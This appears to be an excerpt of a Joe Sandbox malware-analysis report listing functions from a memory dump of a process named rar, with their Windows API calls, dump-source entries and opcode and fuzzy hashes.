                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterEventLeave
                                                              • String ID:
                                                              • API String ID: 3094578987-0
                                                              • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                              • Instruction ID: acb3e521abd7c8735cc918fa963e6b8afcfb6e06388073fafe8e86834fb3f545
                                                              • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                              • Instruction Fuzzy Hash: F6F06222A18A4A83DE20EF26F9400BE6360FFCAB9AF040134DE9D4666DDE2CD555DB01
                                                              Function 00007FF629B07B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ConsoleFileHandleModeType
                                                              • String ID:
                                                              • API String ID: 4141822043-0
                                                              • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                              • Instruction ID: c554aef4d6f53da9bf3e79680d90acccd62cfaa65cc0855b7cbe565290a6e2d8
                                                              • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                              • Instruction Fuzzy Hash: E2E08C20E0460B42EF584F23ACA513E12519F9EB83F405038D80FCA750EE2CA485D301
                                                              Function 00007FF629B52488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                              • Instruction ID: d9d58aeb4384265c851dfd9aca2d7b253a8e654679a165595086a383c48f7675
                                                              • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                              • Instruction Fuzzy Hash: F7E09A24E0974E82FE546F769C8537E23626FCA743F00543CCD0E96396DE3DB8499252
                                                              Function 00007FF629B14044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CharEnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 4052775200-0
                                                              • Opcode ID: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                              • Instruction ID: dd2f9990e50d9a0789e18c2def79be734b9f73a6cef692154ac016ada63c322a
                                                              • Opcode Fuzzy Hash: a3ba1b03603a475655284a6a52820d5ab219f11978c107c81e75b3572b44f527
                                                              • Instruction Fuzzy Hash: 12E1D322A1868681EF208F65E8002BF67A2FBD3795F444131DB9D876D9DF7CE481E702
                                                              Function 00007FF629B11AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF629B07EBE,00000000,00000000,00000000,00000000,00000007,00007FF629B07C48), ref: 00007FF629B11B8D
                                                              • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF629B07EBE,00000000,00000000,00000000,00000000,00000007,00007FF629B07C48), ref: 00007FF629B11BD7
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                              • Instruction ID: 0e89461598d1930c6e431097ef67a9ef35bdbe2c05ac4724004e7154e06988c0
                                                              • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                              • Instruction Fuzzy Hash: AB312663A186494AFB709F21D8053AF36A0EB83B7AF104334DA6C866C5DF7CD585E742
                                                              Function 00007FF629B2915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a42658d34a1fb92fbd8d718425b99dc084056a970e35fbbcb39c16e60e17b306
                                                              • Instruction ID: aa5030dd8015168b47f5e5625cbc594187fbaea1b96f89278838654bde50ce8e
                                                              • Opcode Fuzzy Hash: a42658d34a1fb92fbd8d718425b99dc084056a970e35fbbcb39c16e60e17b306
                                                              • Instruction Fuzzy Hash: 5A118431A09B8581EE00DF64E9543AE7294EFC6795F140638D69D477E6DE38D051E311
                                                              Function 00007FF629B120B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                              • Instruction ID: 10b2816af76f00eb4ef6ee9be2aa05c035be191cdf87bf776d32560801dc6762
                                                              • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                              • Instruction Fuzzy Hash: BF01E525E1969A42EE688F26E80146E6261EFD7BF1F145730DA2D83BD4CE3CE451EB01
                                                              Function 00007FF629B07A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • setbuf.LIBCMT ref: 00007FF629B07A7B
                                                                • Part of subcall function 00007FF629B52AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF629B57EF3
                                                              • setbuf.LIBCMT ref: 00007FF629B07A8F
                                                                • Part of subcall function 00007FF629B07B44: GetStdHandle.KERNEL32(?,?,?,00007FF629B07A9E), ref: 00007FF629B07B4A
                                                                • Part of subcall function 00007FF629B07B44: GetFileType.KERNELBASE(?,?,?,00007FF629B07A9E), ref: 00007FF629B07B56
                                                                • Part of subcall function 00007FF629B07B44: GetConsoleMode.KERNEL32(?,?,?,00007FF629B07A9E), ref: 00007FF629B07B69
                                                                • Part of subcall function 00007FF629B52ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF629B52AD0
                                                                • Part of subcall function 00007FF629B52B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF629B52C1C
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                              • String ID:
                                                              • API String ID: 4044681568-0
                                                              • Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                              • Instruction ID: 7f38928273bb8bcd8ecdce9b9cb3d725e47330c8b88bec31726aebc0ec01037f
                                                              • Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
                                                              • Instruction Fuzzy Hash: 23019E01E1A18A16FE18BFB59CA23BF65828FD3313F544278E52E8A7D3DD1C6445A353
                                                              Function 00007FF629B12440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                              • Instruction ID: 56ad3079ba996761698f63fddb95932b12cf9d6b4ec809f2ba4a944ca1cb0e1d
                                                              • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                              • Instruction Fuzzy Hash: D301A521E1864A82EF649F2AE84037E2350EF8677AF144335D23D811E5CF3CD586DB11
                                                              Function 00007FF629B130C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000800,00007FF629B1305D,?,?,?,?,?,?,?,?,00007FF629B24126,?,?,?,?,00000800), ref: 00007FF629B130F0
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF629B24126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF629B13119
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                              • Instruction ID: 84474f52536cc42518d6cad3dd5630de88767fbbca76579511b2e8d8111d4da2
                                                              • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                              • Instruction Fuzzy Hash: 83F0AF22B1868542EE609F25FC943AE6290BB8F7D5F400131EA9CC7799DE7CE584AA01
                                                              Function 00007FF629B3B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                              • Instruction ID: a9529ca89a1daa51ecd42d5fbd48a0d8c8d3365d48e91f224c1f0751313f64f5
                                                              • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                              • Instruction Fuzzy Hash: 2FF06222B2858542FE70AF21EC153FF6264BFCA785F804035E9CDC6699DE2CE244EA01
                                                              Function 00007FF629B3BA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                              • Instruction ID: 1b4f9cf8d7721f8d9df3dd06abb612c5eed68c6144d02da4447fc2d2c39ded53
                                                              • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                              • Instruction Fuzzy Hash: 3FE0E520B3845A43DFD89B2A8891FAE2390AB86B81F802039F40AC3A14DD1CD4448B01
                                                              Function 00007FF629B54A74 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                              • String ID:
                                                              • API String ID: 588628887-0
                                                              • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                              • Instruction ID: 7e8494c5e86f6884e237417d61a5b2505954526daa3b295d21be9409182c5636
                                                              • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                              • Instruction Fuzzy Hash: 15E04F61E1910F42FE58AFB39C4417E12925FCA746F048434D90DD6251EE2CA441A206
                                                              Function 00007FF629B371FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
